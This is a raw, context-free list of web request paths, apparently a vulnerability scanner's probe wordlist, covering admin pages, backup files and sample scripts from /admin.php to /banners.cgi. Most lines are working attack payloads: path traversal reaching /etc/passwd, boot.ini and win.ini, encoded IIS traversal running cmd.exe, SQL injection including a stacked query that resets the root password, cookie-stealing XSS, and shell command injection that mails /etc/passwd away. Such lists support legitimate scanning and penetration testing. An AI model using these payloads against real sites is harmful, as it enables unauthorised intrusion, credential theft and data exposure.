/admin.php?style=../robots.txt%00&language=ircrash
/admin.php?upgradefile=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt
/admin.pl
/admin.pw
/admin.shtml
/admin.txt
/admin.udl
/admin/
/admin/?no_rgcheck=true&lang=1&l_username=%3C%2Ftd%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E%3Ctd%3E
/admin/?op=%c0
/admin/accounts/listreason.asp?ListReason=tester'
/admin/addentry.php?phpbb_root_path=/../../../../../../../../boot.ini%00
/admin/addentry.php?phpbb_root_path=/../../../../../../../../etc/passwd%00
/admin/addentry.php?phpbb_root_path=/../../../../../../../../winnt/win.ini%00
/admin/admin
/admin/admin.cgi
/admin/admin.php
/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
/admin/adminproc.asp
/admin/adminsettings/browsedisk.asp?filepath=c:\&Opt=3
/admin/adminsettings/browsewebalizerexe.asp
/admin/adminsettings/browsewebalizerexe.asp?filepath=c:\&Opt=3
/admin/admin_hacks_list.php?setmodules=3D1&board_conf=ig[default_lang]=3Denglish&phpEx=3D401637099996
/admin/admin_index.php?Myguestbook=1
/admin/admin_login_validate.php
/admin/admin_modif.php?Myguestbook=1
/admin/admin_pass.php?Myguestbook=1
/admin/admin_phpinfo.php
/admin/admin_phpinfo.php3
/admin/admin_phpinfo.php4
/admin/admin_suppr.php?Myguestbook=1
/admin/approveComment.asp?id=402957100869'error
/admin/autosignup/dsp_newwebadmin.asp
/admin/backup.php
/admin/browse.asp?FilePath=c:\&Opt=2&level=0
/admin/cal_login.php?op=login
/admin/case/case.adminfaq.php/admin.php?op=FaqCatGo
/admin/case/case.filemanager.php/admin.php?op=move&confirm=1&do=copy&basedir=&file=/tmp/dat.dat&newfile=done.php
/admin/classes/minixml/classes/doc.inc.php
/admin/classes/minixml/classes/element.inc.php
/admin/classes/minixml/classes/node.inc.php
/admin/code/index.php
/admin/connect.inc
/admin/contextAdmin/contextAdmin.html
/admin/cpconfig.php
/admin/cplogfile.log
/admin/credit_card_info.php
/admin/cron.php?path_to_config=/../../../../../../../../boot.ini%00
/admin/cron.php?path_to_config=/../../../../../../../../etc/passwd%00
/admin/cron.php?path_to_config=/../../../../../../../../winnt/win.ini%00
/admin/database.php?action=write&userID=1
/admin/database/wwForum.mdb
/admin/datasource.asp
/admin/dbg_infos.php
/admin/delete.asp
/admin/deleteicon.aspx
/admin/departments.php?projectIssueId=%22%3E%3Cscript%3Ealert(xss)%3C/script%3E%3C%22
/admin/design.php?voir=1&skinfile=../../../../etc/passwd
/admin/dsn/dsnmanager.asp?DSNAction=ChangeRoot&RootName=..\..\..\..\..\..\..\..\..\..\boot.ini
/admin/dsn/dsnmanager.asp?DSNAction=ChangeRoot&RootName=D:\webspace\opendnsserver\target\target.com\db\..\..\..\..\
/admin/edit.asp?id=-1%27
/admin/editcatalogue.php?cat=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/emoticonlist.php?lang=1&l_emoticonlist=%3C%2Ftitle%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/exec.php3
/admin/filemanager/preview.php?file=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/filemanager/preview.php?file=1&x=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/filemanager/preview.php?file=1&y=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/file_manager.php?action=download&filename=../../../../../../../../etc/passwd
/admin/folders/filemanager.asp&siteindex=testing&sitename=testing.com&OpenPath=C:\webspace\resadmin\testing\testing.com\www\..\..\..\..\..\
/admin/forgot_pass.php?submit=1&user_name=-1%27
/admin/fr-toc.html
/admin/geo_zones.php?zone=%3Cscript%3Ealert(xss)%3C/script%3E
/admin/header.inc.php?charset=%27%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/header.inc.php?la_adm_header=%3C%2Ftitle%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/header.inc.php?site_name=%3C%2Ftitle%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/header.php?admin%5Bname%5D=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/header.php?voir=1&skinfile=../../../../../../../../../../etc/passwdfile
/admin/heading.php
/admin/Help/srvadmin
/admin/htmlarea/popups/file/files.php?q=%3Cscript%3Ealert('xss405837103121')%3C/script%3E&Mode=apparel
/admin/image.php?image=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath=C:\&oftpPath=C:\
/admin/includes/dbtables.inc
/admin/includes/initsystem.php?loader_file=/../../../../../../../../boot.ini%00
/admin/includes/initsystem.php?loader_file=/../../../../../../../../etc/passwd%00
/admin/includes/initsystem.php?loader_file=/../../../../../../../../winnt/win.ini%00
/admin/includes/languages/english.php?_SESSION[language]=/../../../../../../../../boot.ini%00
/admin/includes/languages/english.php?_SESSION[language]=/../../../../../../../../etc/passwd%00
/admin/includes/languages/english.php?_SESSION[language]=/../../../../../../../../winnt/win.ini%00"
/admin/index.html?message=%3Cscript%3Ealert%2810260%29%3C%2Fscript%3E
/admin/index.php
/admin/index.php/"><script>alert(xss)</script>
/admin/index.php/%22%3E%3Cscript%3Ealert(xss)%3C/script%3E%3Ctd%20class=%22p
/admin/index.php?idsession='%20OR%20''='
/admin/index.php?lang=123
/admin/index.php?loginmessage=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/index.php?msg=1&username=%22%3E%3Cscript%3Ealert%28402427100535%29%3C%2Fscript%3E%3C%22
/admin/index.php?page=general&step=2
/admin/layout2b.php?no_rgcheck=true&lang=1&do_login=1&l_username=%3C%2Ftd%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E%3Ctd%3E
/admin/login.asp
/admin/login.php
/admin/login.php?action=insert&username=test&password=test
/admin/login.php?email=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/login.php?in_login=yes&retpage=%2Fadmin%2F
/admin/login.php?path="></form*><form%20name=a*><input%20name=i%20value=vulnerable*>&lt;script*>alert(document.a.i.value)</script*>
/admin/login.php?path=\
/Admin/Login_Validate.asp
/admin/main.asp
/admin/main.php?sid=../../../../../../../../boot.ini%00
/admin/main.php?sid=../../../../../../../../winnt/win.ini%00
/admin/managesettings.php
/admin/moderation
/admin/mods/SimpleChat_1.0.0/chat_panel.php?talk=1
/admin/mod_plugins.php
/admin/nav.php?la_search_home=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/nav.php?site_url=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E%3Cnoscript%3E
/admin/operators.php?projectIssueId=%22%3E%3Cscript%3Ealert(xss)%3C/script%3E%3C%22
/admin/options.php
/admin/password.php?action=sendmail
/admin/password_forgotten.php
/admin/phpinfo.php
/admin/plog-themes.php?activate=%2500%27
/admin/print_order.php?order_id=%27
/admin/print_order.php?order_id=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/processlogin.php
/admin/salesadmin.php?resultpage=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/savesettings.php
/admin/ServerProperties.html
/admin/server_day_stats.php?year=2006%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&month=05&day=2
/admin/server_day_stats.php?year=2006&month=05%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&day=2
/admin/server_day_stats.php?year=2006&month=05&day=2%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admin/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
/admin/serv_u/servubrowse.asp
/admin/serv_u/servubrowse.asp?filepath=c:\&Opt=3
/admin/setup.cgi
/admin/setup.php
/admin/signin.aspx?returnurl=>"><script>alert(document.domain)</script>
/admin/sqlbrowse.asp?filepath=c:\&Opt=3
/admin/SQLServ/sqlbrowse.asp
/admin/stats/statsbrowse.asp
/admin/stats/statsbrowse.asp?filepath=c:\&Opt=3
/admin/system.php3
/admin/system_footer.php
/admin/upload.asp
/admin/upload.htm
/admin/upload.php
/Admin/Users/AddModifyInput.php
/admin4.nsf
/admin4.nsf/?OpenDatabase
/admin5.nsf
/admincp/
/admincp/css.php?do=doedit&dostyleid=1&group=%3Cscript%3Ealert%28xss%29%3C/script%3E
/admincp/index.php?do=buildnavprefs&nojs=0&prefs=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admincp/index.php?do=savenavprefs&nojs=0&navprefs=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/admincp/index.php?redirect=%3Cscript%3Ealert%2810644%29%3C%2Fscript%3E
/admincp/index.php?redirect=%3Cscript%3Ealert%28xss%29%3C/script%3E
/admincp/index.php?vb_login_username=<script>alert(document.cookie)</script>
/admincp/language.php?do=rebuild&goto=%3Cscript%3Ealert%28xss%29%3C/script%3E
/admincp/modlog.php?do=view&orderby=%3Cscript%3Ealert%28xss%29%3C/script%3E
/admincp/template.php?do=colorconverter&hex=%3Cscript%3Ealert%28xss%29%3C/script%3E
/admincp/template.php?do=colorconverter&rgb=%3Cscript%3Ealert%28xss%29%3C/script%3E
/admincp/template.php?do=modify&expandset=%3Cscript%3Ealert%28xss%29%3C/script%3E
/admincp/user.php?do=emailpassword&email=%3Cscript%3Ealert%28xss%29%3C/script%3E
/admincp/user.php?do=find&orderby=username&limitnumber=%27
/admincp/user.php?do=find&orderby=username&limitstart=%27
/adminhot.cgi
/Administration/
/administrator
/administrator.nsf
/administrator/
/administrator/gallery/gallery.php
/administrator/gallery/navigation.php
/administrator/gallery/uploadimage.php
/administrator/gallery/view.php
/administrator/index2.php
/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator
/administrator/popups/index3pop.php?mosConfig_sitename=%3C%2Ftitle%3E%3Cscript%3Ealert%2810792%29%3C%2Fscript%3E
/administrator/popups/index3pop.php?mosConfig_sitename=%3C%2Ftitle%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/administrator/popups/pollwindow.php?pollid=1%27
/administrator/popups/sectionswindow.php
/administrator/upload.php
/adminlogin?RCpage:=/sysadmin/index.stm
/adminlogin?RCpage=/sysadmin/index.stm
/adminlogon
/AdminMain
/adminopts/include/ban_form.php
/adminopts/include/board_form.php
/adminopts/include/login_form.php
/adminopts/include/vip_form.php
/adminopts/login_form.php
/AdminProps
/AdminRealm
/admins.htx
/admins/
/admins/savesettings.php
/adminsample
/adminsample/
/adminuser/
/AdminWeb/
/adminwww.cgi
/admin_
/admin_/
/admin_/help/..%255Cplsql.conf
/admin_category_details.asp?mode=%3Cscript%3Ealert%2810696%29%3C%2Fscript%3E
/Admin_files
/Admin_files/
/Admin_files/order.log
/admin_login
/admin_logon
/admin_t/
/admin_t/include/aff_liste_langue.php?rep_include=
/admin_t/include/find_theni_home.php
/admisapi/
/admisapi/ 
/admisapi/fpadmin.htm
/admission/
/ADMOGFILE?PARAMS=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/adodb/tests/tmssql.php?do=undefined_special_function&sql=generate_sql_error
/adovbs.inc
/adpassword.txt
/ads.cgi
/ads/
/ads/admin.cgi
/adsamples/
/adsamples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/adsamples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/adsamples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir
/adsamples/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/adsamples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/adsamples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/adsamples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/adsamples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/adsamples/config/site.csc
/adsearch.php?title=1&desc=on&closed=on&category='
/adsl_reset
/advwebadmin
/advwebadmin/
/advwebadmin/adminsettings/browsedisk.asp
/advwebadmin/adminsettings/browsewebalizerexe.asp
/advwebadmin/autosignup/dsp_newwebadmin.asp
/advwebadmin/folders/filemanager.asp&siteindex=testing&sitename=testing.com&OpenPath=C:\webspace\resadmin\testing\testing.com\www\..\..\..\..\..\
/advwebadmin/serv_u/servubrowse.asp
/advwebadmin/SQLServ/sqlbrowse.asp
/AdvWebAdmin/stats/statsbrowse.asp
/advwebadmin/stats/statsbrowse.asp?filepath=c:\&Opt=3
/advwedadmin/adminsettings/browsedisk.asp?filepath=c:\&Opt=3
/advwedadmin/adminsettings/browsewebalizerexe.asp?filepath=c:\&Opt=3
/advwedadmin/serv_u/servubrowse.asp?filepath=c:\&Opt=3
/advwedadmin/sqlbrowse.asp?filepath=c:\&Opt=3
/advworks/
/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp 
/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:")|
/adxmlrpc.php
/ad_click.asp?banner_id='
/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/af.cgi?_browser_out=|id|
/affiliates/
/afmsearch.aspx
/agencies/
/Agent/
/agentadmin.php
/agentadmin.php?agentname='
/agentadmin.php?agentname='%20OR%20''='&agentpassword='%20OR%20''='
/Agentes
/agentes/
/agentrunner.nsf
/AgentRunner.nsf/?OpenDatabase
/agents/
/agent_affil.pl?login=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22405877103164%22%29%3B%3C%2F%73%63%72%69%70%74%3E
/aglimpse
/aglimpse.cgi
/aglimpse.cgi/80|IFS=5;CMD=5mail5test\@test.com\</etc/passwd;eval$CMD;echo
/aglimpse/80|IFS=5;CMD=5mail5test\@test.com\</etc/passwd;eval$CMD;echo
/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo
/ajax.php?rs=__exp__getFeedContent&rsargs%5B%5D=%27
/ajax/sortcategories.php?CategoryID=%27
/ajaxp_backend.php
/ajfork/inc/main.mdu
/akopia
/akopia/
/aktivate/cgi-bin/catgy.cgi
/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=
/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('vulnerable')</script>
/al/
/album.asp?cat=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&albumid=1
/album.asp?cat=&albumid=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/album.php?albumID=1'405597102929
/Album/
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/alert/
/alerts/
/alias/
/aliases/
/alibaba.pl?|dir%20..\\..\\..\\..\\..\\..\\..\\,
/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
/alibill/
/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/aliredir.exe
/allaire/
/allgemein_transfer.php?monat=4&jahr=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/allmanage.pl
/allmanageup.pl
/allow/
/all_calendars.asp?calsids=error402377100490)
/alog.nsf
/alpha/
/alya.cgi
/AM
/am.pl?login=../../../../../../../../boot.ini%00&action=add_department
/am.pl?login=../../../../../../../../etc/passwd%00&action=add_department
/am.pl?login=../../../../../../../../winnt/win.ini%00&action=add_department
/amadmin.pl
/amadmin.pl?setpasswd
/amateur/
/amateurs/
/amlite/amadmin.pl
/ana-bin/
/anacondaclip
/anacondaclip.cgi
/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd
/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/analog
/analog-5.1/
/analog/
/analyze/
/andromeda.php?q=s&sm=fi&s=%3CIFRAME%20SRC=javascriptt(%2527xss403277101162%2527)%3E%3C/IFRAME%3E&x=9&y=7
/ani/
/ani1/
/anime/
/anlgform.html
/ans.pl?p=../../../../../usr/bin/id|&blah
/ans.pl?p=../../../../bin/command
/ans/ans.pl?p=../../../../../usr/bin/id|&blah
/anthill/
/anthill/buglist.php?type=all&allclass=all&search=<script>alert(document.location)</script>
/anthill/login.php
/anyfile.jsp
/AnyForm
/anything.jsp
/aoljtest.jsp
/apache/
/apage/lcgi-bin/ndsobj.nlm
/apage/lcgi-bin/sewse.nlm?sysonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
/apexec.cgi
/apexec.pl
/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/app
/app/
/application
/application.cfm
/application.php?base_path=../../../../../../../../boot.ini%00
/application.php?base_path=../../../../../../../../etc/passwd%00
/application.php?base_path=../../../../../../../../winnt/win.ini%00
/application/
/applications/
/Application_Assemblies/
/Application_Browsers/
/application_code/
/Application_Data/
/Application_GlobalResources/
/Application_LocalResources/
/application_themes/
/application_webreferences/
/applicattion/
/applicattions/
/applist.asp
/approval/
/apps
/apps/
/apps/web/index.fcgi?servers=&section=
/apps/web/index.fcgi?servers=&section=<script>alert('XSS')</script>
/apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
/apps/web/index.fcgi?servers=&section=<script>alert(xss)</script>
/apps/web/vs_diag.cgi?server=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/apps/web/vs_diag.cgi?server=<script>alert(document.cookie)</script>
/AppSettingsForm.asp
/appweb/
/appz/
/apt/
/ap_afodpdemo.shtml
/ar/
/arc/
/arch/
/architext_query
/architext_query.cgi
/architext_query.pl
/archivar/
/archive
/archive.php?blogid=%27
/archive.php?blogid=1&cid=%27
/archive.php?blogid=1&eid=%27
/archive.php?blogid=1&pid=%27
/archive.php?blogid=force_error_for_test_reason
/archive.php?cid=%27
/archive.php?m=%27
/archive.php?pid=%27
/archive.php?y=%27
/archive/
/archive/a_domlog.nsf
/archive/a_domlog.nsf/?OpenDatabase
/archive/index.php?_SERVER%5BHTTP_CLIENT_IP%5D=%27
/archive/l_domlog.nsf
/archive/l_domlog.nsf/?OpenDatabase
/archives/
/archivo/
/area.View.action?areaID=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/area.View.action?areaID=%3Cscript%3Ealert('xss401957100242')%3B%3C/script%3E&time=%3Cscript%3Ealert('xss401957100242')%3B%3C/script%3E
/art/
/article.php?article=1&post=1111111111111111111111111111
/article.php?article=4965&post=1111111111
/article.php?sid="><Img%20Src=javascript:alert(document.cookie)><Img%20Src="
/article.php?sid=%27
/article.php?sid=1
/article.php?sid=\
/article/
/article/profile.php?author_id=1%27
/articles.php?action=file&id=%27
/articles/
/articles/index.php?feedback=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/ArticleView.php?article_id=force_error_406187103416
/ash
/asian/
/asians/
/asp
/asp.net/
/asp/
/ASP/cart/database/metacart.mdb
/asp/samples/viewcode.asp?file=index.asp
/asp/sqlqhit.asp
/aspnet
/aspnet/
/aspnet_client/
/ASPSamp
/ASPSamp/
/ASPSamp/AdvWorks
/ASPSamp/AdvWorks/equipment/achg.htr
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/aspstats/
/AspUpload/DirectoryListing.asp
/aspupload/Test11.asp
/AspUpload/UploadScript11.asp
/aspuploads/Test11.asp
/aspx/
/assemblies/
/assets/
/as_web.exe
/as_web.exe?Command=search&file=non-existant-file&request=&MaxHits=10&NumLines=1
/as_web.exe?existant-ask-file!!.ask+B+<script>alert('vulnerable')</script>
/as_web4.exe
/as_web4.exe?Command=First&File=..\winnt\win.ini
/as_web4.exe?Command=First&File=non-existant-file
/as_web4.exe?existant-ask-file!!.ask+B+<script>alert('vulnerable')</script>
/AT-admin.cgi
/AT-generate.cgi
/atc/
/athcgi.exe?command=showpage&script='],[0,0]];alert('Hello%20there!');a=[['
/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
/atl.cgi?ct=%22%3E%3Cscript%3Ealert(xss)%3C/script%3E
/atl.cgi?ct=a8&md=search&brf=&before=%22%3E%3Cscript%3Ealert(xss)%3C/script%3E
/ats/
/attachments.php?file=../../../../../../../../../../../../../../../etc/passwd
/ATutor/contact.php?subject=%3Cscript%3Ealert%28xss%29%3C/script%3E
/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script>&Where=&Sort=Photo&Dir=
/auctionweaver.pl
/auction_rating.php?mode=view&u='
/audit/
/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts
/auktion.pl?menue=../../../../../../../../etc/passwd
/auth
/auth.cgi
/auth.inc.php?admin='aaaaaa
/auth.php
/auth/
/authadmin
/authadmin/
/authenticate.cgi
/authldap.php?includePath=/../../../../../../../../boot.ini%00
/authldap.php?includePath=/../../../../../../../../etc/passwd%00
/authldap.php?includePath=/../../../../../../../../winnt/win.ini%00
/author.asp
/author.asp?authornumber=1%28%20And%20AuthorTable%2EAuthorID%3DBlurbTable%2EAuthorID%20And%20BlurbTable%2ESub_id%3DSubjectTable%2ESub_id%20Order%20By%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime%20desc%3BUPDATE%20user%20SET%20Password%3DPASSWORD%28%27password%27%29%20WHERE%20user%3D%27root%27%3B%20FLUSH%20PRIVILEGES%3B--
/authordetail.php?autid=%27
/auth_user_file.txt
/autoexec.bat
/autohtml.php?op=modload&mainfile=x&name=/etc/passwd
/autohtml.php?op=modload&name=/../../../../../../../../etc/passwd
/aux
/aux.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
/aux.html
/aux.jsp
/aux/
/auxpage.php?page=../../../../../../../../boot.ini%00
/auxpage.php?page=../../../../../../../../etc/passwd%00
/auxpage.php?page=../../../../../../../../winnt/win.ini%00
/avatar.php?img=3D../../../../../etc/passwd
/aw/
/awebvisit.stat
/awl/auctionweaver.cgi
/awl/auctionweaver.pl
/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini
/awstats.pl?hostfilter=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&hostfilterex=&output=allhosts&config=unsecured-systems.com&year=2006&month=all
/awstats.pl?hostfilter=&hostfilterex=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&output=allhosts&config=unsecured-systems.com&year=2006&month=all
/awstats.pl?refererpagesfilter=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&refererpagesfilterex=&output=refererpages&config=unsecured-systems.com&year=2006&month=all
/awstats.pl?refererpagesfilter=&refererpagesfilterex=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&output=refererpages&config=unsecured-systems.com&year=2006&month=all
/awstats.pl?urlfilter=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&urlfilterex=&output=urlentry&config=unsecured-systems.com&year=2006&month=all
/awstats.pl?urlfilter=&urlfilterex=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&output=urlentry&config=unsecured-systems.com&year=2006&month=all
/ax-admin.cgi
/ax.cgi
/axis-cgi/buffer/command.cgi
/axis/EchoHeaders.jws
/axis/fingerprint.jsp
/axis/happyaxis.jsp
/axis/noSuchWebService.jws?wsdl
/axs.cgi
/ayuda/
/azdlite/
/azdlite/index.php?l=en"><script>alert(document.cookie);</script>
/azdlite/view.php?l=&id=<script>alert(document.cookie);</script>
/a_domlog.nsf
/a_security.htm
/b/
/b2-include/
/b2-include/b2edit.showposts.php
/b2-include/b2edit.showposts.php?b2inc=/NONEXISTENT
/b2evolution/blogs/blog_a.php
/back-up/
/back/
/backdoor/
/backend
/backup
/backup/
/backups
/backups/
/baddir123/
/badfile123.asp
/badfile123.asp/a<script>alert(097531)</script>
/badfile123.htm
/badfile123.html
/BADFIL~1.ASP
/bak
/bak-up/
/bak/
/bakup/
/ban.bak
/ban.dat
/ban.log
/banca/
/banco/
/bank/
/banmat.pwd
/banner.cgi
/banner/
/banner01/
/bannereditor.cgi
/bannereditor.pl
/banners.cgi?aff=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
